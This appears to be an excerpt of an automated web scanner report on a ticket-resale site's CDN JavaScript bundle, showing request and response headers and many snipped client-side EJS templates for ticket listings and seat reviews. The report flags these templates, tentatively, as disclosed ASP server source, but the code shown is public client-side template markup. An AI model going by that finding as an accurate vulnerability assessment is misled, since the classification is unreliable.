<div class="seatprice" data-ticketSetId="<%= ticketId %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=0;dt=<%= totalDeals %>;lpos=<%= listPosition %>">\n\
<div class="<%= TicketListFormattingHelpers.choosePriceClass(price) %>">
...[SNIP]...
<span class="price"><%= TicketListFormattingHelpers.addCommas(price) %></span>
...[SNIP]...
<div class="select-btn-<%= goButtonClass %> new-go-button"><%= goButtonText %></div>\n\
<% if (FS.config.view.props.highlightBasePrice) { %>\n\
<div class="total-with-fee">$<%= TicketListFormattingHelpers.addCommas(Math.ceil(totalPrice)) %> with<br/> <%= broker.length > 13 ? \'seller\' : broker %> fees</div>
...[SNIP]...
<div id="<%= listPosition %><%= domIdModifier %>-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText, \'hoverAction\': true})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.props.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="tixLogo">\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-compact-\'+brokerId+\'.gif\'), \'broker logo\') %>\n\
</div>
...[SNIP]...
<div class="best-value-<%= bvTag %>">
...[SNIP]...
<strong>\n\
<% if ((typeof row_style === \'undefined\') || row_style == \'both\') { %>\n\
<span class="ticket-section"><%= section %></span>
...[SNIP]...
<span>Row&nbsp;<%= row %></span>\n\
<% } else if (row_style == \'row_only\') { %>\n\
<span class="row-only-view" >Row:&nbsp;<%= row %></span>
...[SNIP]...
<span class="series-date"><%= dateTime %></span>\n\
<div class="handling">\n\
<%= splitsText %>\n\
<% if (eTicketsUI && hasETicket) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket", "title": "eTicket" } ) %>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'row_only\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'none\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %>&nbsp;<%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section!&nbsp;\n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to("&nbsp;", \'/reviews_photos_intro\', {target: \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="seat-view-link-rt">\n\
<%= link_to(\'Zoom into map\',"javascript:void(0)", {\'class\': \'zoom-to-map\'}) %>\n\
</div>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %>&nbsp;<%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section!&nbsp;\n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to("&nbsp;", \'/reviews_photos_intro\', {\'target\': \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>
...[SNIP]...

16.6. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: OR7ncKwYvc5cp5ICj0h8IEPnrtRoILVjGMI3SFA2P8fmjLESYfEqvpeAXoGi3JEm
x-amz-request-id: FFE99421EFAA9283
Date: Tue, 12 Jul 2011 18:00:07 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:02:29 GMT
ETag: "375af793d6130c7c9074d680589bbc99"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 157752
Server: AmazonS3
Age: 606816
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 1259b8a58779033176a8a5bdb0f722368a3dd31bd8535769ebfa4dc25deb986bd74e3129c6d8c0b6
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function($){var topics={};$.fn.publish=function(topic,args,sync){if(typeof topics[topic]=="undefined"){return this;}
var args=args||[],argsLength=args.length,t=topics[topic],l=t.length,that=this,publ
...[SNIP]...
each(_.functions(obj),function(name){addToWrapper(name,_[name]=obj[name]);});};var idCounter=0;_.uniqueId=function(prefix){var id=idCounter++;return prefix?prefix+id:id;};_.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};_.template=function(str,data){var c=_.templateSettings;var tmpl='var __p=[],print=function(){__p.push.apply(__p,arguments);};'+'with(obj||{}){__p.push(\''+
str.replace(/\\/g,'\\\\').replace(/'/g,"\
...[SNIP]...
ame:userName,userXid:user.get("userXid"),venueName:venueName};var name=eventName;if(opts.nameTemplate){name=this._renderTemplate(opts.nameTemplate,context);}
var captionTemplate=opts.captionTemplate||"<%= eventDate %> in <%= eventCity %>.";var caption=this._renderTemplate(captionTemplate,context);var hash=opts.hash;if(opts.hashTemplate){hash=this._renderTemplate(opts.hashTemplate,context);}
var params={method:'feed',name:name,caption:
...[SNIP]...
entifyingData:function(){var idString=this.uid+'|'+this.style+'|'+this.channel+'|'+this.ctx;return idString;}};if(typeof preCompiledEJSTemplates=='undefined'){var preCompiledEJSTemplates={};}
var str='<% var broker_ids = [];\n\
for(broker_id in brokers) {\n\
broker_ids[brokers[broker_id][\'sort_order\']] = broker_id;\n\
};\n\
%>
\n\
<div id="broker_filter" class="in-map-filter-holder">
...[SNIP]...
<h2>Providers (<%= num_brokers %>)</h2>
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < broker_ids.length; i++) { %>\n\
<li class="in-map-filter-<%= logos_enabled ? "bg" : "no" %>-img">
...[SNIP]...
<div class="in-map-filter-labels">\n\
<% if(logos_enabled) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-\'+ broker_ids[i] +\'.gif\'), broker_id +\'_id\') %>\n\
<% } %>
...[SNIP]...
<label for="<%= broker_ids[i] %>_id">\n\
<%= brokers[broker_ids[i]]["name"] %> (<strong><%= brokers[broker_ids[i]]["seat_count"] %></strong>)\n\
<% if (channel.forceParam) {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details?ch=\' + channel.code;\n\
}\n\
else {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details\';\n\
}\n\
%>
\n\
[<a href=\'<%= link %>\' onclick=\'broker_popup(this.href); return false;\'>
...[SNIP]...
<input type="checkbox" class="flt_brk" name="brks[]" id="<%= broker_ids[i] %>_id" value="<%= broker_ids[i] %>" <%= brokers[broker_ids[i]][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>
...[SNIP]...
<div id="locationList">\n\
<%= lookupEjsTemplate(\'seats_page/location_filter_inner.ejs\').render({\'facets\': facets, \'outer_class_name\': "flt_area", \'outer_input_name\': \'areas[]\', \'child_class_name\': \'flt_sec\', \'child_input_name\': \'secs[]\'})%>\n\
<div class="in-map-select">
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < facets.length; i++) { %>\n\
<li class="static-list-ele">
...[SNIP]...
<input type="checkbox" id="areas[]-<%= facets[i].id%>" name="areas[]" value="<%= facets[i].id%>" class="<%= outer_class_name %>" <%=facets[i][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>\n\
<label class="static-list-label"><%= facets[i].name %></label>\n\
<% if (facets[i].children) { %>\n\
<span class=\'expandable\'>
...[SNIP]...
<ul class="mSecList" >\n\
<% for(var j=0; j < facets[i].children.length; j++) { %>\n\
<li class="mSecListItems">
...[SNIP]...
<input type="checkbox" class="<%= child_class_name %>" name="secs[]" value="<%= facets[i].children[j].id %>" <%=facets[i].children[j][\'start_checked\'] ? \' checked="checked"\' : \'\' %> />
...[SNIP]...
<label> <%= facets[i].children[j].name %> </label>
...[SNIP]...
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel_inner.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
</div>
...[SNIP]...
<div class="providerNotes">\n\
<%= notes %>\n\
</div>
...[SNIP]...
<tbody>\n\
<% var eTickets = false, eTicket, i; %>\n\
<% for (i = 0; i < deals.length; i++) { %>\n\
<%\n\
if (eTicketsUI && deals[i].delivery && deals[i].delivery[0] == \'do_et\') {\n\
eTicket = true;\n\
eTickets = true;\n\
} else {\n\
eTicket = false;\n\
}\n\
%>
\n\
<tr class="providerRow <%= (i != deals.length - 1) ? \'notlast\' : \'\'%>">
...[SNIP]...
<td class="providerName<%= eTicket ? \' e-ticket\' : \'\' %>"><%= deals[i].broker %></td>
...[SNIP]...
<td class="salePrice<%= FS.config.view.props.highlightBasePrice ? \' boldPrice\' : \'\' %>"><%= float_to_currency(deals[i].salePrice, 2) %></td>
...[SNIP]...
<td class="handlingFee"><%= float_to_currency(deals[i].handlingFee, 2) %></td>
...[SNIP]...
<td class="totalPrice<%= FS.config.view.props.highlightBasePrice ? \'\' : \' boldPrice\' %>"><%= float_to_currency(deals[i].salePrice + deals[i].handlingFee, 2) %></td>
...[SNIP]...
<div class="blueButton_small" data-ticketSetId="<%= deals[i].id %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=<%= i + 1 %>;dt=<%= totalDeals %>;lpos=<%= listPosition %>" data-dealPosition="<%= i %>"><%= goButtonText %></div>
...[SNIP]...
<div class="additionalNotes">\n\
<% if (eTickets) { %>\n\
<div><%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket" } ) %> eTicket</div>
...[SNIP]...
<div class="providerFeesNote"><%= detailPanelNote %></div>
...[SNIP]...
</span>\n\
<% if (sharingEnabled) { %>\n\
<span class ="panelLink shareLink">
...[SNIP]...
<% } %>\n\
<% if (shortListEnabled) { %>\n\
<% if (saved) {\n\
var text = \'Saved\';\n\
var savedCss = " savedOffer";\n\
} else {\n\
var text = \'Save\';\n\
var savedCss = "";\n\
} %>
\n\
<span class ="panelLink saveLink<%= savedCss %>"><a href="javascript:void(0)"><%= text %></a>
...[SNIP]...
<div class="seatprice" data-ticketSetId="<%= ticketId %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=0;dt=<%= totalDeals %>;lpos=<%= listPosition %>">\n\
<div class="<%= TicketListFormattingHelpers.choosePriceClass(price) %>">
...[SNIP]...
<span class="price"><%= TicketListFormattingHelpers.addCommas(price) %></span>
...[SNIP]...
<div class="select-btn-<%= goButtonClass %> new-go-button"><%= goButtonText %></div>\n\
<% if (FS.config.view.props.highlightBasePrice) { %>\n\
<div class="total-with-fee">$<%= TicketListFormattingHelpers.addCommas(Math.ceil(totalPrice)) %> with<br/> <%= broker.length > 13 ? \'seller\' : broker %> fees</div>
...[SNIP]...
<div id="<%= listPosition %><%= domIdModifier %>-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText, \'hoverAction\': true})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.props.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="tixLogo">\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-compact-\'+brokerId+\'.gif\'), \'broker logo\') %>\n\
</div>
...[SNIP]...
<div class="best-value-<%= bvTag %>">
...[SNIP]...
<strong>\n\
<% if ((typeof row_style === \'undefined\') || row_style == \'both\') { %>\n\
<span class="ticket-section"><%= section %></span>
...[SNIP]...
<span>Row&nbsp;<%= row %></span>\n\
<% } else if (row_style == \'row_only\') { %>\n\
<span class="row-only-view" >Row:&nbsp;<%= row %></span>
...[SNIP]...
<span class="series-date"><%= dateTime %></span>\n\
<div class="handling">\n\
<%= splitsText %>\n\
<% if (eTicketsUI && hasETicket) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket", "title": "eTicket" } ) %>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'row_only\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'none\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
